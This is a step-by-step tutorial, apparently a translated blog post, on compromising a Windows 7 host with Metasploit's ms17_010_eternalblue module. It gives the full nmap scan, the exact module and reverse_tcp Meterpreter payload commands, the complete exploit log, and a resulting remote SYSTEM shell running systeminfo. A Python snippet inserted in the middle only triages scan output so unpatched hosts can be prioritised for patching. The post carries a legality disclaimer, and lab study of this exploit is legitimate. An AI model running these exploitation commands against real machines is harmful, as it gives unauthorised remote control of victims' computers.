Using Metasploit (msf) via ms17

First, two things to introduce:

Be clear on one point: attacking someone else's computer without authorization is illegal.

Now on to this post's topic....

First open Kali (a well-known Linux distribution built for penetration testing, and an essential pentesting toolkit).

Then open Applications - Exploitation Tools - metasploit.

On success it shows the following:

[i] Database already started
[i] The database appears to be already configured, skipping initialization
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

       https://metasploit.com

       =[ metasploit v4.17.3-dev                          ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 

Run nmap directly against host 10.0.3.65 to scan its ports:

msf > nmap -sV -Pn -p1-65535 -O -v 10.0.3.65

The result is as follows:

TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
YoussefdeMacBook-Pro:~ youssef$ sudo nmap -sV -Pn -p1-65535 -O -v 10.0.3.65
Password:
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 10:56 CST
NSE: Loaded 43 scripts for scanning.
Initiating ARP Ping Scan at 10:56
Scanning 10.0.3.65 [1 port]
Completed ARP Ping Scan at 10:56, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:56
Completed Parallel DNS resolution of 1 host. at 10:56, 0.01s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning 10.0.3.65 [65535 ports]
Discovered open port 139/tcp on 10.0.3.65
Discovered open port 135/tcp on 10.0.3.65
Discovered open port 3389/tcp on 10.0.3.65
Discovered open port 445/tcp on 10.0.3.65
Discovered open port 49153/tcp on 10.0.3.65
Discovered open port 49157/tcp on 10.0.3.65
Discovered open port 49152/tcp on 10.0.3.65
Discovered open port 49155/tcp on 10.0.3.65
Discovered open port 49154/tcp on 10.0.3.65
Discovered open port 49156/tcp on 10.0.3.65
Discovered open port 1688/tcp on 10.0.3.65
Completed SYN Stealth Scan at 10:57, 37.66s elapsed (65535 total ports)
Initiating Service scan at 10:57
Scanning 11 services on 10.0.3.65
Service scan Timing: About 36.36% done; ETC: 10:59 (0:01:35 remaining)
Completed Service scan at 10:58, 81.47s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.0.3.65
NSE: Script scanning 10.0.3.65.
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Initiating NSE at 10:58
Completed NSE at 10:58, 0.04s elapsed
Nmap scan report for 10.0.3.65
Host is up (0.0039s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
1688/tcp  open  msrpc          Microsoft Windows RPC
3389/tcp  open  ms-wbt-server?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
49156/tcp open  msrpc          Microsoft Windows RPC
49157/tcp open  msrpc          Microsoft Windows RPC
MAC Address: 2C:6E:85:8D:C8:C7 (Intel Corporate)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Uptime guess: 0.311 days (since Tue Aug  7 03:30:19 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: WIN-EEGC1ODGIOU; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 123.04 seconds
           Raw packets sent: 66869 (2.943MB) | Rcvd: 65555 (2.623MB)

The scan shows the host is Windows 7 and has port 445 open, so there is a very high chance the ms17_010_eternalblue vulnerability can be exploited. If the host is not Win7, or that port is not open, then this experiment ends right here.. (꒪ꇴ꒪(꒪ꇴ꒪ ;) huh?
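As an added defender-side example (not code from the original post), here is a small Python parser for nmap's normal output that pulls out the open ports and the OS guess, then applies the same precondition the post uses (445/tcp open and a Windows 7 / 2008 / 8.1 fingerprint) to flag hosts that should be prioritised for MS17-010 patching and SMBv1 removal. The embedded report is a constructed, trimmed copy of the scan above; the function names are my own.

```python
import re

# Constructed sample: a trimmed copy of the nmap report above (same host, ports, OS guess).
SAMPLE_REPORT = """\
Nmap scan report for 10.0.3.65
Host is up (0.0039s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server?
Running: Microsoft Windows 7|2008|8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
"""

# One port table row: "<port>/<proto>  <state>  <service>  [version...]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_report(text):
    """Extract host, open ports and the OS guess from nmap's normal (-oN style) output."""
    report = {"host": None, "open_ports": {}, "running": None, "os_details": None}
    for line in text.splitlines():
        if line.startswith("Nmap scan report for "):
            report["host"] = line.split()[-1]
        elif line.startswith("Running: "):
            report["running"] = line[len("Running: "):]
        elif line.startswith("OS details: "):
            report["os_details"] = line[len("OS details: "):]
        else:
            m = PORT_RE.match(line)
            if m and m.group(3) == "open":  # ignore closed/filtered rows
                report["open_ports"][f"{m.group(1)}/{m.group(2)}"] = (m.group(4), m.group(5).strip())
    return report


def ms17_010_triage(report):
    """Return (flagged, reason) using the post's precondition: SMB reachable on 445/tcp and an
    OS guess in the Windows 7/2008/8.1 family. The OS fingerprint is only a guess, so a flag is a
    patch-priority hint for the asset owner, not proof that the host is vulnerable."""
    smb = report["open_ports"].get("445/tcp")
    if smb is None:
        return False, "445/tcp not open: SMB not reachable, not a candidate"
    fam = report["running"] or ""
    if not re.search(r"Windows (7|2008|8\.1)", fam):
        return False, f"445/tcp open but OS guess '{fam}' is outside the Windows 7/2008/8.1 family"
    return True, f"445/tcp open ({smb[0]}) and OS guess '{fam}': prioritise MS17-010 patch / SMBv1 removal"
```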

Next, to exploit the vulnerability, enter:

msf > use exploit/windows/smb/ms17_010_eternalblue    // use the ms17_010_eternalblue module
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.0.3.65    // set the target
rhost => 10.0.3.65
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp    // use meterpreter; it is a nice one that offers many interesting features. Setting it is optional: without it you simply get a Windows cmd
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > run    // launch the attack

The output is as follows:

[*] Started reverse TCP handler on 10.0.3.215:4444 
[*] 10.0.3.65:445 - Connecting to target for exploitation.
[+] 10.0.3.65:445 - Connection established for exploitation.
[+] 10.0.3.65:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.3.65:445 - CORE raw buffer dump (42 bytes)
[*] 10.0.3.65:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.0.3.65:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.0.3.65:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.0.3.65:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.3.65:445 - Trying exploit with 17 Groom Allocations.
[*] 10.0.3.65:445 - Sending all but last fragment of exploit packet
[*] 10.0.3.65:445 - Starting non-paged pool grooming
[+] 10.0.3.65:445 - Sending SMBv2 buffers
[+] 10.0.3.65:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.3.65:445 - Sending final SMBv2 buffers.
[*] 10.0.3.65:445 - Sending last fragment of exploit packet!
[*] 10.0.3.65:445 - Receiving response from exploit packet
[+] 10.0.3.65:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.3.65:445 - Sending egg to corrupted connection.
[*] 10.0.3.65:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.0.3.65
[*] Meterpreter session 3 opened (10.0.3.215:4444 -> 10.0.3.65:49162) at 2018-08-07 11:41:05 +0800
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.3.65:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

View system information with sysinfo:

meterpreter > sysinfo
Computer        : WIN-EEGC1ODGIOU
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

Get a command-line shell:

meterpreter > shell
Process 2772 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>
C:\Windows\system32>systeminfo
systeminfo

主机名:           WIN-EEGC1ODGIOU
OS 名称:          Microsoft Windows 7 专业版 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          独立工作站
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00371-OEM-8992671-00524
初始安装日期:     2017/8/25, 16:31:04
系统启动时间:     2018/8/7, 11:59:41
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 1 个处理器。
                  [01]: Intel64 Family 6 Model 61 Stepping 4 GenuineIntel ~1995 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2017/5/19
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,542 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   3,569 MB
虚拟内存: 使用中: 526 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 1 个修补程序。
                  [01]: KB976902
网卡:             安装了 1 个 NIC。
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      连接名:      本地连接
                      启用 DHCP:   是
                      DHCP 服务器: 10.0.3.1
                      IP 地址
                        [01]: 10.0.3.65
                        [02]: fe80::dec:dc90:295b:668c

C:\Windows\system32>

Exit:

C:\Windows\system32>exit
exit
meterpreter > 
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.0.3.65 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(windows/smb/ms17_010_eternalblue) > 

For details on the individual commands, see this article:

http://blog.51cto.com/helloeveryone/1112040
